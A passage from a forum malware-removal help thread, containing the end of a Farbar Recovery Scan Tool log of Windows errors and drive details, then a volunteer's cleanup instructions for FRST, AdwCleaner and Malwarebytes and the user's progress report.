Report Id: 8bb8233a-ca54-11e5-af14-889ffaae8a5e
 
Error: (01/31/2016 09:06:16 PM) (Source: MsiInstaller) (EventID: 1024) (User: ERIN)
Description: Product: Adobe Reader XI (11.0.13) - Update '{AC76BA86-7AD7-0000-2550-7A8C40011014}' could not be installed. Error code 1625. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127
 
Error: (01/31/2016 07:19:10 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\Windows\system32\svchost.exe -k netsvcs; Description = Windows Update; Error = 0x81000101).
 
Error: (01/30/2016 09:27:05 PM) (Source: MsiInstaller) (EventID: 1024) (User: ERIN)
Description: Product: Adobe Reader XI (11.0.13) - Update '{AC76BA86-7AD7-0000-2550-7A8C40011014}' could not be installed. Error code 1625. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127
 
Error: (01/27/2016 06:06:34 PM) (Source: MsiInstaller) (EventID: 1023) (User: NT AUTHORITY)
Description: Product: Microsoft .NET Framework 4.5.2 - Update 'KB3097996' could not be installed. Error code 1603. Additional information is available in the log file C:\Windows\TEMP\KB3097996_20160127_170518794-Microsoft .NET Framework 4.5.2-MSP0.txt.
 
Error: (01/19/2016 12:05:28 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
Error: Failed to make the SOAP Call HResult: 0x800c0005. Exception caught while trying to report the Update Event
 
Error: (01/19/2016 12:05:28 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: There are currently no active network connections. Background Intelligent Transfer Service (BITS) will try again when an adapter is connected.
 
 
System errors:
=============
Error: (02/10/2016 02:17:50 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)
 
Error: (02/10/2016 02:17:47 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
 
Error: (02/10/2016 02:07:43 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)
 
Error: (02/10/2016 02:07:41 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
 
Error: (02/10/2016 02:07:32 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Intel® PROSet/Wireless Event Log service failed to start due to the following error: 
%%1053
 
Error: (02/10/2016 02:07:32 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Intel® PROSet/Wireless Event Log service to connect.
 
Error: (02/05/2016 07:44:33 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
 
Error: (02/05/2016 07:43:57 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)
 
Error: (02/05/2016 07:34:33 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
 
Error: (02/05/2016 07:33:57 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)
 
 
CodeIntegrity:
===================================
  Date: 2014-05-21 21:36:56.938
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2014-05-21 21:36:56.735
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i3 CPU M 380 @ 2.53GHz
Percentage of memory in use: 58%
Total physical RAM: 3892.52 MB
Available physical RAM: 1629.46 MB
Total Virtual: 7783.25 MB
Available Virtual: 5162.27 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:451.01 GB) (Free:113.06 GB) NTFS
Drive d: (GAME_OF_THRONES_S1_DISC1) (CDROM) (Total:7.61 GB) (Free:0 GB) UDF
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 07F2837E)
Partition 1: (Not Active) - (Size=102 MB) - (Type=DE)
Partition 2: (Active) - (Size=14.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=451 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================


#13 therrrn

therrrn
  • Topic Starter

  • Members
  • 47 posts
  • OFFLINE
  •  
  • Local time:12:03 PM

Posted 10 February 2016 - 06:07 AM

So I've been on it a little and my WSOP is crashing now, which is really annoying because I live in Nevada, so I'm actually playing with real money. I could just need to reinstall it or something, though. I'm not sure. I humbly put my computer in your hands. :)



#14 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,695 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:03 PM

Posted 10 February 2016 - 03:39 PM

Good to know that your computer is running better now :) As for WSOP, I suggest you to uninstall it for now, wait until I declare you clean, then reinstall it and see if it still crashes :)

We'll run a second FRST fix to take care of the remnants not cleaned off during the first fix, and then follow-up with AdwCleaner and Malwarebytes. Follow the instructions below please.

iO3R662.pngFarbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.
  • Download the attached fixlist.txt file, and save it on your Desktop (or wherever your FRST.exe/FRST64.exe executable is located);
  • Right-click on the FRST executable and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Click on the Fix button;
    NYA5Cbr.png
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad;
  • Copy and paste that log in your next reply;


zcMPezJ.pngAdwCleaner - Fix Mode
  • Download AdwCleaner and move it to your Desktop;
  • Right-click on AdwCleaner.exe and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Accept the EULA (I accept), let the database update, then click on Scan;
  • Let the scan complete. Once it's done, make sure that every item listed in the different tabs is checked and click on the Cleaning button. This will kill all the active processes;
    CfdTLN1.png
  • Once the cleaning process is complete, AdwCleaner will ask to restart your computer, do it;
  • After the restart, a log will open when logging in. Please copy/paste the content of that log in your next reply;
aOpBoaQ.pngMalwarebytes Anti-Malware - Clean Mode
  • Download and install the free version of Malwarebytes Anti-Malware
    Note: It's your choice if you want to enable the free trial of Malwarebytes Premium or not. Enabling it will give you real-time protection from the program, as well as access to all the Premium features.
    Note: If you have Malwarebytes already installed, you don't need to install it again. Simply start from the next bullet point;
  • Once Malwarebytes is installed, launch it and let it update his database. You might have to click on the Update Now button;
  • Once the database update is complete, click on the Scan tab, then select the Threat Scan button and click on Start Scan;
  • Let the scan run, the time required to complete the scan depends of your system and computer specs;
  • Once the scan is complete, make sure that the checkbox by Threat is checked (it means that every item detected is checked), then click on the Remove Selected button;
    L9PN4j1.png
  • Click on Save Results after the deletion (in the bottom-right corner) and select Copy to clipboard. Paste the content in your next reply;
Your next reply(ies) should therefore contain:
  • Copy/pasted content of the fixlog.txt log;
  • Copy/pasted AdwCleaner clean log;
  • Copy/pasted Malwarebytes clean log;

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#15 therrrn

therrrn
  • Topic Starter

  • Members
  • 47 posts
  • OFFLINE
  •  
  • Local time:12:03 PM

Posted 11 February 2016 - 06:04 AM

Thanks so much for everything. When I turned my computer back on, Windows updated for about 20 minutes. Then, once I was able to get in, I uninstalled WSOP. I then ran the fix again and after, I needed to restart my computer, so I hit ok and it sat there "shutting down" forever. Probably about 15 minutes until finally, I just held down the power button to turn it off. When I turned it back on, it said windows didn't shut down normally and all that. I just started windows "normally" and it took forever to start up. After all that, it had been almost an hour and I have to wake up really early. I'll post tomorrow when I get home after I finish the rest of your instructions. Thanks again so much for all your time. I'll talk to you tomorrow.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users